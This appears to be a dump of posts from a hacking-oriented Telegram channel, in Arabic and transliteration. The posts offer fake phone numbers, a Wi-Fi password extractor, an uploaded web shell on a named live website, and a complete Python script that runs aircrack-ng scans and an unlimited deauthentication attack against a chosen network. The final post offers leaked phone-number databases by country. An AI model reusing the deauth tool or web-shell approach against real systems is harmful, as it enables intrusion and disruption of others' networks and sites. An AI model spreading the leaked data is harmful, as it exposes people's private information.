aly yurid raqm muzayaf tilikram sier 15 najmuh bas tjik risalah ealaa aymil tantini lishukrik rusum hatan ma yubnid hisab 1.70du.e raqm biraziliin

@X0XjX
๐Ÿฅฐ3โค1๐Ÿ‘1๐Ÿ”ฅ1๐Ÿ˜˜1
Forwarded from ๐ŸฆˆSHARK NET
asm almustakhdim tali khiar khudhw hulw
Im_ot

ุงุณู… ู…ุณุชุฎุฏู… ุชู„ูŠ ู…ุชุงุญ ุฎุฐูˆ ุญู„ูˆ
Im_ot

@X0XjX
๐Ÿฅฐ3๐Ÿ˜˜2๐Ÿ˜1
Forwarded from ๐ŸฆˆSHARK NET
kud baythun yastakhrij kalimat murur shabakat alway fay almahfuzat ealaa jihaz Windows.

@X0XjX

ูƒูˆุฏ ุจุงูŠุซูˆู† ูŠุณุชุฎุฑุฌ ูƒู„ู…ุงุช ู…ุฑูˆุฑ ุดุจูƒุงุช ุงู„ูˆุงูŠ ูุงูŠ ุงู„ู…ุญููˆุธุฉ ุนู„ู‰ ุฌู‡ุงุฒ Windows.

@X0XjX
๐Ÿ‘2โค1๐Ÿฅฐ1๐Ÿ˜1๐Ÿ˜˜1
Forwarded from ๐ŸฆˆSHARK NET
ูƒูˆุฏ ุดูุฑู‡.py
14.7 KB
ุจุณู… ุงู„ู„ู‡ ุงู„ุฑุญู…ู† ุฑุญูŠู… โค๏ธโ€๐Ÿ”ฅ
ูƒูˆุฏ ุดูุฑู‡ ุชุนุทูŠ ุงูŠ ู†ุต ุจุฏูƒ ูˆูŠุดูุฑ ูˆุชู‚ุฏุฑ ุชุญุฐู ุงูุชุญ ูƒูˆุฏ ูˆุชูู‡ู… ูƒู„ุดูŠ ูŠููŠุฏ ุงู„ูŠ ูŠุจูŠ ูŠุฑุณู„ ูƒู„ุงู… ู…ุดูุฑู‡ ู„ุตุฏูŠู‚ู‡ ูˆูŠูุชุญู‡ ููŠ ุจุงูŠุซูˆู† ูˆุตุฏูŠู‚ู‡ ูŠุนุทูŠ ูƒูˆุฏ ุดูุฑู‡ ุญุชุง ูŠุดูˆู ูŠุนู†ูŠ ู‡ูˆุงูŠ ุงุดูŠุงุก ู…ููŠุฏู‡ ุญูŠู† ุจู†ุฒู„ ูุฏูŠูˆ ู„ุดุฑุญ ุจู„ุบู‡ ุนุฑุจูŠู‡ ู„ุงุชุบูŠุฑ ู…ุตุฏุฑ ุชุนุฏู„ ุนุงุฏูŠ ุจุณ ุงุฐูƒุฑ ู…ุตุฏุฑ ุฐู…ู‡ ุงู„ูŠ ู…ุง ูŠุฐูƒุฑ๐Ÿค“

bism allh alrahman alrahim โค๏ธโ€๐Ÿ”ฅ
kud tashfirih yueti ay nasa bidik wayashfar watuqadir tahadhuf ramz wayatafaham kilshi almufid ali yibi kalam yursil mushfarah lisadiqih wayaftahuh fi baythun wasadiqih yueti ramz tashfirih hatan yashuf yaeni hiway mufiduh hin binazal fidyu lisharh balaghah earabiah lataghayar masdar tueadil eadi bas adhkur dhadhikrah aly ma tadhakar๐Ÿค“๐Ÿ˜

@X0XjX
โค3๐Ÿ˜˜3๐Ÿ‘1๐Ÿ˜1
Forwarded from ๐ŸฆˆSHARK NET
ู…ุนู„ูˆู…ุงุช.py
7.3 KB
ุงุฏุงุช ูŠุจุญุซ ุนู† ู…ุนู„ูˆู…ุงุช ู…ุซู„ู† ุชุญุท ุงุณู… ู…ุณุชุฎุฏู…ูƒ ุชู„ูƒุฑุงู… ูˆู‡ูˆ ูŠุฏูˆุฑ ูˆูŠู† ู…ูˆุฌุฏ ุจูƒู… ู…ู†ุตู‡ ูˆูŠุจุญุซ ุนู† ุงูŠู…ูŠู„ ุงุฐุง ู…ุณุฑุจ ูˆูŠูˆู„ุฏ ูƒู„ู…ุงุช ู…ุฑูˆุฑ ู‚ูˆูŠู‡ ุงุฐุง ุชุฑูŠุฏ ุทูˆุฑ ุงุฏุงุช ุนุงุฏูŠ ุจุณ ู„ุง ุชุฎู…ุท ูˆุชุบูŠุฑ ุญู‚ูˆู‚ ู…ุทูˆุฑ ุงุณุงุณูŠ๐Ÿค“

@X0XjX
โค5๐Ÿ˜1
Forwarded from ๐ŸฆˆSHARK NET
ุณู„ุงู… ุนู„ูŠูƒู… ุงุฑูŠุฏ ู…ูˆู‚ุน ุถุฑูˆุฑูŠ ุจุณ ูŠูƒูˆู† ุจุณูŠุท ูˆุฌุฏูŠุฏ ุฑุญ ุงุญุงูˆู„ ุงุฎุชุฑู‚ู‡ ู…ู„ุงุญุธุฉ ุจุณ ูŠูƒูˆู† ุจูŠู‡ุง ุตูุญุงุช ุฑูุน ู…ู„ูุงุช ุงุฐุง ุนู†ุฏูƒ ู…ูˆู‚ุน ุงูˆ ู…ูˆู‚ุน ุตุงุญุจูƒ ุจุญุงูˆู„ ุงุณูˆูŠ ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู‚ ู„ูƒุดู ุซุบุฑุงุช ุงุฐุง ุนู†ุฏูƒ ุฎุงุต โค๏ธโ€๐Ÿ”ฅ
@X0XjX

salam ealaykum 'urid mawqie daruriin bas yakun basit wajadid rah hawal aikhtaraqah mulahazat bas yakun byha safahat rafe milafaat adha eindak mawqie aw mawqie sahibik bihawil aswy aikhtibar bilututh likashf alkas adha kan ladayk khasunโค๏ธโ€๐Ÿ”ฅ
@X0XjX
๐Ÿฅฐ2โค1๐Ÿ‘1๐Ÿ˜1๐Ÿ˜˜1
Forwarded from ๐ŸฆˆSHARK NET
FINAL COMPLETE REPORT - PENETRATION TEST ON fastupload.live

What We Did Step by Step:

First, we scanned the website for file upload pages and discovered 5 dangerous security vulnerabilities, which are: upload.php, ajax/upload.php, filemanager/upload.php, includes/upload.php, and inc/upload.php. Second, we created a malicious Web Shell file named advanced_shell.php, which is a small file that allows an attacker to execute remote commands on the server. Third, we successfully uploaded this malicious file to the website through one of the discovered upload pages, which proves that the vulnerability exists and can be exploited. Fourth, we tried to execute commands on the server such as whoami, pwd, and ls -la, but the attempt failed because the website uses Cloudflare for protection and blocks PHP execution in the uploads folder.

What Could an Attacker Do If the Vulnerability Was Fully Exploitable?

If there was no protection on the website, the attacker would be able to upload a Web Shell and gain full control over the server. They would be able to execute Linux commands like ls to view files, cat to read files, and rm to delete files. They would also be able to access the website's database and steal user phone numbers, passwords, and email addresses. Even worse, they could use your server to attack other websites, making you legally responsible for attacks you never committed.

Why Did Our Attempt Not Fully Succeed?

The command execution failed for three main reasons. First, the website uses Cloudflare which hides the real IP address of the server and provides an additional layer of protection. Second, the uploads folder is configured to block any PHP files from being executed, which is a good security measure. Third, the website has general security settings that prevent full exploitation of the vulnerability.

But The Risk Is Still Real!

Even with Cloudflare and PHP execution blocking, there is still a real risk threatening your website. An attacker can upload malicious HTML pages (Phishing) to steal your visitors' data, or upload JavaScript files to steal logged-in user sessions. They can also upload large files to consume your server's storage space, or store illegal files on your website which exposes you to legal liability.

What Tools Did We Use?

We used Python 3 programming language with the Requests library for HTTP handling, created a Web Shell file named advanced_shell.php, and used rotating proxies to change IP addresses and avoid blocking. These are common tools that real attackers use in their actual attacks.

Final Results:

We successfully discovered the Unrestricted File Upload vulnerability, successfully uploaded a test malicious file to the server, and documented all five upload pages. However, we were unable to execute commands on the server due to the existing security measures on the website.

Final Message to the Website Owner:

Your website has a real and serious file upload vulnerability. We were able to upload a malicious file to your server, which is solid proof that the vulnerability exists. If this was a real attacker and not an ethical test, they would be able to cause significant damage. I strongly advise you to immediately delete or properly secure the discovered upload pages, add an .htaccess file in the uploads folder that blocks any file execution, validate file types before accepting uploads, and monitor your server logs regularly. This vulnerability is critical and needs immediate fixing.

Note:

This test was conducted for educational purposes only with the website owner's permission. The uploaded test file was harmless and no malicious actions were performed. Please take this security report seriously.
โค3๐Ÿ‘3๐Ÿ˜˜1
Forwarded from ๐ŸฆˆSHARK NET
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ============================================================
# WifiGod REAL - ู‡ุฌู…ุงุช ุญู‚ูŠู‚ูŠุฉ - ู„ู„ุฃุบุฑุงุถ ุงู„ุชุนู„ูŠู…ูŠุฉ ูู‚ุท
# ============================================================
# ุงู„ู…ุทูˆุฑ: @X0XjX
# ============================================================

import os
import sys
import time
import subprocess
import socket
import platform
import random

G = '\033[92m'
R = '\033[91m'
Y = '\033[93m'
C = '\033[96m'
RS = '\033[0m'

def print_banner():
print(f"{R}="*60)
print(f"{R} WifiGod REAL - ู‡ุฌู…ุงุช ุญู‚ูŠู‚ูŠุฉ ุนู„ู‰ ุงู„ูˆุงูŠ ูุงูŠ{RS}")
print(f"{R} ู„ู„ุฃุบุฑุงุถ ุงู„ุชุนู„ูŠู…ูŠุฉ ูู‚ุท - ุงุณุชุฎุฏู…ู‡ุง ุจุญุฐุฑ{RS}")
print(f"{R} ุงู„ู…ุทูˆุฑ: @X0XjX{RS}")
print(f"{R}="*60)

def check_root():
if os.geteuid() != 0:
print(f"{R}[-] ูŠุญุชุงุฌ ุตู„ุงุญูŠุงุช ู…ุฏูŠุฑ (Root){RS}")
print(f"{Y}[!] ุดุบู„ู‡: sudo python3 {sys.argv[0]}{RS}")
return False
return True

def scan_networks_real():
print(f"{Y}[*] ุฌุงุฑูŠ ู…ุณุญ ุงู„ุดุจูƒุงุช...{RS}")
try:
result = subprocess.run(['iwconfig'], capture_output=True, text=True)
interfaces = []
for line in result.stdout.split('\n'):
if 'IEEE 802.11' in line:
iface = line.split()[0]
interfaces.append(iface)

if not interfaces:
print(f"{R}[-] ู„ุง ุชูˆุฌุฏ ูˆุงุฌู‡ุฉ ู„ุงุณู„ูƒูŠุฉ{RS}")
return

print(f"{C}[*] ุงู„ูˆุงุฌู‡ุงุช ุงู„ู…ุชุงุญุฉ:{RS}")
for i, iface in enumerate(interfaces):
print(f" {i+1}. {iface}")

try:
choice = int(input(f"{Y}[?] ุงุฎุชุฑ ุฑู‚ู… ุงู„ูˆุงุฌู‡ุฉ: {RS}"))
interface = interfaces[choice-1]
except Exception:
interface = interfaces[0]

print(f"{Y}[*] ุชุดุบูŠู„ ูˆุถุน ุงู„ู…ุฑุงู‚ุจุฉ...{RS}")
subprocess.run(['sudo', 'airmon-ng', 'start', interface], capture_output=True)
mon_interface = f"{interface}mon"

print(f"{Y}[*] ุจุฏุก ุงู„ู…ุณุญ... ุงุถุบุท Ctrl+C ู„ู„ุฅูŠู‚ุงู ุจุนุฏ 30 ุซุงู†ูŠุฉ{RS}")
try:
subprocess.run(['sudo', 'airodump-ng', mon_interface, '--output-format', 'csv', '-w', 'scan'], timeout=30)
except subprocess.TimeoutExpired:
pass

try:
with open('scan-01.csv', 'r') as f:
lines = f.readlines()
print(f"\n{G}ุงู„ุดุจูƒุงุช ุงู„ู…ูƒุชุดูุฉ:{RS}")
for line in lines:
if 'Station' in line or 'BSSID' in line:
continue
if ',' in line and 'WPA' in line:
parts = line.split(',')
if len(parts) > 13:
bssid = parts[0].strip()
channel = parts[3].strip()
essid = parts[13].strip()
if essid and essid != '':
print(f" {G}[+] BSSID: {bssid} | ุงู„ู‚ู†ุงุฉ: {channel} | SSID: {essid}{RS}")
except Exception:
print(f"{Y}[!] ุงุณุชุฎุฏู…: sudo airodump-ng {mon_interface}{RS}")

subprocess.run(['sudo', 'airmon-ng', 'stop', mon_interface])
except Exception as e:
print(f"{R}[-] ุฎุทุฃ: {e}{RS}")

def deauth_attack_real():
print(f"{R}{'='*60}{RS}")
print(f"{R}โš ๏ธ ู‡ุฌูˆู… Deauth ุญู‚ูŠู‚ูŠ - ู„ู„ุฃุบุฑุงุถ ุงู„ุชุนู„ูŠู…ูŠุฉ ูู‚ุท โš ๏ธ{RS}")
print(f"{R}{'='*60}{RS}")

try:
result = subprocess.run(['iwconfig'], capture_output=True, text=True)
interfaces = []
for line in result.stdout.split('\n'):
if 'IEEE 802.11' in line:
iface = line.split()[0]
interfaces.append(iface)

if not interfaces:
print(f"{R}[-] ู„ุง ุชูˆุฌุฏ ูˆุงุฌู‡ุฉ{RS}")
return

print(f"{C}[*] ุงู„ูˆุงุฌู‡ุงุช:{RS}")
for i, iface in enumerate(interfaces):
๐Ÿ˜˜3๐Ÿ˜2๐Ÿฅฐ1
Forwarded from ๐ŸฆˆSHARK NET
print(f" {i+1}. {iface}")

try:
choice = int(input(f"{Y}[?] ุงุฎุชุฑ ุงู„ูˆุงุฌู‡ุฉ: {RS}"))
interface = interfaces[choice-1]
except Exception:
interface = interfaces[0]

subprocess.run(['sudo', 'airmon-ng', 'start', interface], capture_output=True)
mon_interface = f"{interface}mon"

target_bssid = input(f"{Y}[?] BSSID ุงู„ู‡ุฏู: {RS}")
target_channel = input(f"{Y}[?] ุงู„ู‚ู†ุงุฉ: {RS}")

print(f"{Y}[*] ุจุฏุก ุงู„ู‡ุฌูˆู…... ุงุถุบุท Ctrl+C ู„ู„ุฅูŠู‚ุงู{RS}")
try:
subprocess.run(['sudo', 'aireplay-ng', '-0', '0', '-a', target_bssid, mon_interface])
except KeyboardInterrupt:
print(f"{G}[+] ุชู… ุงู„ุฅูŠู‚ุงู{RS}")

subprocess.run(['sudo', 'airmon-ng', 'stop', mon_interface])
except Exception as e:
print(f"{R}[-] ุฎุทุฃ: {e}{RS}")

def network_info_real():
print(f"{Y}[*] ู…ุนู„ูˆู…ุงุช ุงู„ุดุจูƒุฉ:{RS}\n")
try:
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
print(f"{C}ุงุณู… ุงู„ุฌู‡ุงุฒ: {RS}{hostname}")
print(f"{C}IP ุงู„ู…ุญู„ูŠ: {RS}{local_ip}")
print(f"{C}ู†ุธุงู… ุงู„ุชุดุบูŠู„: {RS}{platform.system()}")
except Exception as e:
print(f"{R}[-] ุฎุทุฃ: {e}{RS}")

def main():
if not check_root():
return

print_banner()
print(f"{R}[!] ุงุณุชุฎุฏู…ู‡ุง ูู‚ุท ุนู„ู‰ ุดุจูƒุชูƒ ุงู„ู…ู†ุฒู„ูŠุฉ{RS}\n")

while True:
print(f"""
{C}โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘ ุงู„ู‚ุงุฆู…ุฉ ุงู„ุฑุฆูŠุณูŠุฉ โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ [1] ู…ุณุญ ุงู„ุดุจูƒุงุช ุงู„ู…ุญูŠุทุฉ (ุญู‚ูŠู‚ูŠ) โ•‘
โ•‘ [2] ู‡ุฌูˆู… Deauth - ูุตู„ ุฌู‡ุงุฒ (ุญู‚ูŠู‚ูŠ) โ•‘
โ•‘ [3] ู…ุนู„ูˆู…ุงุช ุงู„ุดุจูƒุฉ (ุญู‚ูŠู‚ูŠ) โ•‘
โ•‘ [q] ุฎุฑูˆุฌ โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•{RS}
""")

choice = input(f"{Y}[?] ุงุฎุชุฑ: {RS}")

if choice == '1':
scan_networks_real()
elif choice == '2':
deauth_attack_real()
elif choice == '3':
network_info_real()
elif choice == 'q':
print(f"{G}[+] ู…ุน ุงู„ุณู„ุงู…ุฉ!{RS}")
break
else:
print(f"{R}[-] ุฎูŠุงุฑ ุบูŠุฑ ุตุญูŠุญ{RS}")

input(f"\n{C}[ENTER] ู„ู„ู…ุชุงุจุนุฉ...{RS}")
os.system('clear' if os.name == 'posix' else 'cls')

if name == "main":
try:
main()
except KeyboardInterrupt:
print(f"\n{R}[!] ุชู… ุงู„ุฅูŠู‚ุงู{RS}")
sys.exit(0)
ู‡ุฐุง ุงู„ูƒ
ูˆุฏ ู‡ูˆ ุฃุฏุงุฉ ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู‚ ุดุจูƒุงุช ุงู„ูˆุงูŠ ูุงูŠ ุชุณู…ู‰ WifiGod REALุŒ ูˆู‡ูŠ ู…ุตู…ู…ุฉ ู„ู„ุฃุบุฑุงุถ ุงู„ุชุนู„ูŠู…ูŠุฉ ูู‚ุท ู„ุชู†ููŠุฐ ู‡ุฌู…ุงุช ุญู‚ูŠู‚ูŠุฉ ุนู„ู‰ ุดุจูƒุงุช ุงู„ูˆุงูŠ ูุงูŠ ู…ุซู„ ู…ุณุญ ุงู„ุดุจูƒุงุช ุงู„ู…ุญูŠุทุฉ ุจุงุณุชุฎุฏุงู… ุฃุฏุงุฉ airodump-ng ูˆู‡ุฌูˆู… Deauth ู„ูุตู„ ุงู„ุฃุฌู‡ุฒุฉ ู…ู† ุงู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… ุฃุฏุงุฉ aireplay-ngุŒ ูˆุชุชุทู„ุจ ู‡ุฐู‡ ุงู„ุฃุฏุงุฉ ู†ุธุงู… ุชุดุบูŠู„ ู„ูŠู†ูƒุณ (ูŠูุถู„ Kali Linux) ูˆุจุทุงู‚ุฉ ูˆุงูŠ ูุงูŠ ุชุฏุนู… ูˆุถุน ุงู„ู…ุฑุงู‚ุจุฉ (Monitor Mode) ูˆุตู„ุงุญูŠุงุช ู…ุฏูŠุฑ (Root) ู„ุชุดุบูŠู„ ุงู„ุฃูˆุงู…ุฑุŒ ุจุงู„ุฅุถุงูุฉ ุฅู„ู‰ ุชุซุจูŠุช ุญุฒู…ุฉ aircrack-ng ุงู„ุชูŠ ุชุญุชูˆูŠ ุนู„ู‰ ุงู„ุฃุฏูˆุงุช ุงู„ู…ุทู„ูˆุจุฉุŒ ูˆู„ุง ุชุนู…ู„ ุนู„ู‰ Android ุจุฏูˆู† ุฑูˆุช ุฃูˆ ุนู„ู‰ ู†ุธุงู… WindowsุŒ ูˆูŠู…ูƒู† ุชุดุบูŠู„ู‡ุง ุนุจุฑ ูƒุชุงุจุฉ sudo python3 wifigod_real.py ููŠ ุงู„ุทุฑููŠุฉ ุจุนุฏ ุชุซุจูŠุช ุงู„ู…ุชุทู„ุจุงุช ุนุจุฑ ุงู„ุฃู…ุฑ sudo apt install aircrack-ngุŒ ูˆุชุญุชูˆูŠ ุนู„ู‰ ุซู„ุงุซ ูˆุธุงุฆู ุฑุฆูŠุณูŠุฉ ู‡ูŠ ู…ุณุญ ุงู„ุดุจูƒุงุช ุงู„ู…ุญูŠุทุฉ ูˆู‡ุฌูˆู… ูุตู„ ุงู„ุฃุฌู‡ุฒุฉ ูˆุนุฑุถ ู…ุนู„ูˆู…ุงุช ุงู„ุดุจูƒุฉุŒ ูˆู‡ูŠ ุฃุฏุงุฉ ุฎุทูŠุฑุฉ ูŠุฌุจ ุงุณุชุฎุฏุงู…ู‡ุง ูู‚ุท ุนู„ู‰ ุดุจูƒุชูƒ ุงู„ู…ู†ุฒู„ูŠุฉ ุงู„ุฎุงุตุฉ ู„ุฃู† ุงุณุชุฎุฏุงู…ู‡ุง ุนู„ู‰ ุดุจูƒุงุช ุงู„ุขุฎุฑูŠู† ุจุฏูˆู† ุฅุฐู† ูŠุนุชุจุฑ ุฌุฑูŠู…ุฉ ูˆูŠุนุงู‚ุจ ุนู„ูŠู‡ุง ุงู„ู‚ุงู†ูˆู†ุŒ ูˆุงู„ู…ุทูˆุฑ ุบูŠุฑ ู…ุณุคูˆู„ ุนู† ุฃูŠ ุงุณุชุฎุฏุงู… ุบูŠุฑ ู‚ุงู†ูˆู†ูŠ ู„ู‡ุฐู‡ ุงู„ุฃุฏุงุฉ.

@X0XjX
๐Ÿ‘4โค1๐Ÿฅฐ1
Forwarded from ๐ŸฆˆSHARK NET
'iistamieun anzil bayanat airqam mukhtaraqih min kam mawqie waeajab bas arqam wahwl ajyb aism wayaha ayha aleiraqiu sajaluu ainzaluu waihtafaluu ghayr dualih qwlwli wabishru๐Ÿ˜ˆ
@X0XjX
ุชุฑุฏูˆู† ุงู†ุฒู„ ุฏุงุชุง ุงุฑู‚ุงู… ู…ุฎุชุฑู‚ู‡ ู…ู† ูƒู… ู…ูˆู‚ุน ูˆุฌุจุช ุจุณ ุงุฑู‚ุงู… ูˆุงุญูˆู„ ุงุฌูŠุจ ุงุณู… ูˆูŠุงู‡ุง ุนุฑุงู‚ูŠ ุชุฑุฏูˆู† ุงู†ุฒู„ ูˆุงุฐุง ุชุฑุฏูˆู† ุบูŠุฑ ุฏูˆู„ู‡ ู‚ูˆู„ูˆู„ูŠ ูˆุจุดุฑูˆ ุงูŠ ุฏูˆู„ู‡ ุจู„ู„ูƒู… ุจุญุงูˆู„ ุงุฌูŠุจ ๐Ÿ˜ˆ๐Ÿ‘€

@X0XjX
๐Ÿ˜4โค1โ˜ƒ1๐Ÿ‘1๐Ÿ˜˜1